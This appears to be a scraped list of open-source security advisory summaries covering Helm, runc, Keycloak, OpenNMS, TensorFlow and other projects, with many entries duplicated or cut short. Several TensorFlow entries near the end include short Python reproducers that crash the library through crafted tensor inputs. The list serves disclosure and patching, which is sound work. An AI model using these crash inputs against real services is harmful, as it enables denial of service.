An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
The trim-newlines package for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
A flaw was found in the ZeroMQ server This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
The css-what package for Node.js does not ensure that attribute parsing has linear time complexity relative to the size of the input.
Impact If you are using the esbuild target or command you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches The problem has been patched in v1.0.0 as it uses a proper method to pass configs to esbuild/estrella. Workarounds There is no work around. You should update asap. Notes This notice is mainly just …
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in tinymce.
Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …
A flaw was found in keycloak A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
A vulnerability exists in the SAML connector of the github.com/dexidp/dex library used to process SAML Signature Validation. This flaw allows an attacker to bypass SAML authentication. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
A flaw was found in Keycloak where it is possible to update the user's metadata attributes using Account REST API. This flaw allows an attacker to change its own NameID attribute to impersonate the admin user for any particular application.
XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream.
Impact Anyone verifying a Stripe webhook request via this library's constructEvent function. Patches Upgrade to Workarounds Use await verifyHeader(…) directly instead of constructEvent. References https://github.com/worker-tools/stripe-webhook/issues/1
An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. Only action commands against library:// URIs are affected. Other commands such as pull / push respect the configured remote endpoint.
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).
In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …
There is a possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_url helper with untrusted user input.
There is a possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_url helper with untrusted user input.
runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.
Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …
Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …
Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …
User enumeration in database authentication in Flask-AppBuilder <= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in.
There's an security issue in prosody-filer versions < 1.0.1 which leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectors other than /upload/ (or the corresponding user defined root dir) Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …
A flaw was found in the KubeVirt main virt-handler regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.
Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.
A flaw was found in the OpenShift web console, where the access token is stored in the browser's local storage. An attacker can use this flaw to get the access token via physical access, or an XSS attack on the victim's browser.
Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.
A possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_urlhelper with untrusted user input.
Their is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …
A cross-site scripting (XSS) flaw was found in RESTEasy where it does not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.
In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …
In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …
A flaw was found in RESTEasy, where an incorrect response to an HTTP request is provided. This flaw allows an attacker to gain access to privileged information. The highest threat from this vulnerability is to confidentiality and integrity. Versions before resteasy Alpha3 are affected.
Prototype pollution vulnerability in 'js-extend' allows attacker to cause a denial of service and may lead to remote code execution.
If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).
If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in json-ptr.
In the Jakarta Expression Language implementation, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.
In the Jakarta Expression Language implementation, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.
The dep_description (Dependency Description) and dep_name (Dependency Name) parameters are vulnerable to stored XSS.
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …
git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows).
git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows).
ws is an open source WebSocket client and server library for Node. In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers.
Prototype pollution vulnerability in 'deep-defaults' allows attacker to cause a denial of service and may lead to remote code execution.
Prototype pollution vulnerability in nconf-toml allows an attacker to cause a denial of service and may lead to remote code execution.
Pion WebRTC before 3.0.15 didn't properly tear down the DTLS Connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. )A WebRTC implementation shouldn't allow the user to continue if verification has failed.)
Jenkins Filesystem Trigger Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
Jenkins URLTrigger Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the name parameter in noticeWizard endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.
A flaw was found in Wildfly in versions before 23.0.2.Final while creating a new role in domain mode via the admin console, it is possible to add a payload in the name field, leading to XSS. This affects Confidentiality and Integrity.
runc before 1.0.0-rc95 allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized.
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …
This advisory has been marked as False Positive and has been removed.
The Pixar ruby-jss gem allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.
Jenkins Markdown Formatter Plugin does not sanitize crafted link target URLs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to edit any description rendered using the configured markup formatter.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 is vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows assigning ROLE_ADMIN security role to a normal user. Using this flaw, an attacker can trick the admin user to assign administrator privileges to a normal user by enticing him to click upon an attacker-controlled website.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
The package trailing-slash are vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint.
The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl.
cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.
The normalize-url package for Node.js has a ReDoS issue because it has exponential performance for data.
An authentication bypass exists in the goxmldsig this library uses to determine if SAML assertions are genuine. An attacker could craft a SAML response that would appear to be valid but would not have been genuinely issued by the IDP.
Impact Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches A patch is available, …
Feehi CMS When the user modifies the HTTP Referer header to any url, the server can make a request to it.
A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.
Dutchcoders transfer.sh allows Directory Traversal for deleting files.
In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it does not get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.
In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it doesn't get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.
Harbor 1.9.* 1.10.* and 2.0.* allows Exposure of Sensitive Information to an Unauthorized Actor.
Harbor 1.9.* 1.10.* and 2.0.* allows Exposure of Sensitive Information to an Unauthorized Actor.
Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.
containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …
In goxmldsig (XML Digital Signatures implemented in pure Go) before version 1.1.0, with a carefully crafted XML file, an attacker can completely bypass signature validation and pass off an altered file as a signed one. A patch is available, all users of goxmldsig should upgrade to at least revision f6188febf0c29d7ffe26a0436212b19cb9615e64 or version 1.1.0
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with allow setuid = no) run of Singularity when a user attempt to …
In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0
In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0
Sylabs Singularity through 3.6.2 has Insecure Permissions on temporary directories used in explicit and implicit container build operations, a different vulnerability than CVE-2020-25039.
A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.
A stored cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration.
Dutchcoders transfer.sh allows XSS via an inline view.
The @ronomon/opened library is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.
The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries.
@alovak found that currently when we build hash of account number we do not "salt" it. Which makes it vulnerable to rainbow table attack. What did you expect to see? I expected salt (some random number from configuration) to be used in hash.AccountNumber I would generate salt per tenant at least (maybe per organization).
A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Pomerium before 0.13.4 has an Open Redirect (issue 1 of 2).
Pomerium before 0.13.4 has an Open Redirect (issue 1 of 2).
Pomerium from version 0.10.0-0.13.3 has an Open Redirect in the user sign-in/out process
Pomerium from version 0.10.0-0.13.3 has an Open Redirect in the user sign-in/out process
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
The implementation of ParseAttrValue can be tricked into stack overflow due to recursion by giving in a specially crafted input.
The implementation of ParseAttrValue can be tricked into stack overflow due to recursion by giving in a specially crafted input.
The implementation of ParseAttrValue can be tricked into stack overflow due to recursion by giving in a specially crafted input.
TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.
TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.
TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])
The yoast_seo (aka Yoast SEO) extension before 7.2.1 for TYPO3 allows SSRF via a backend user account.
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault
Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
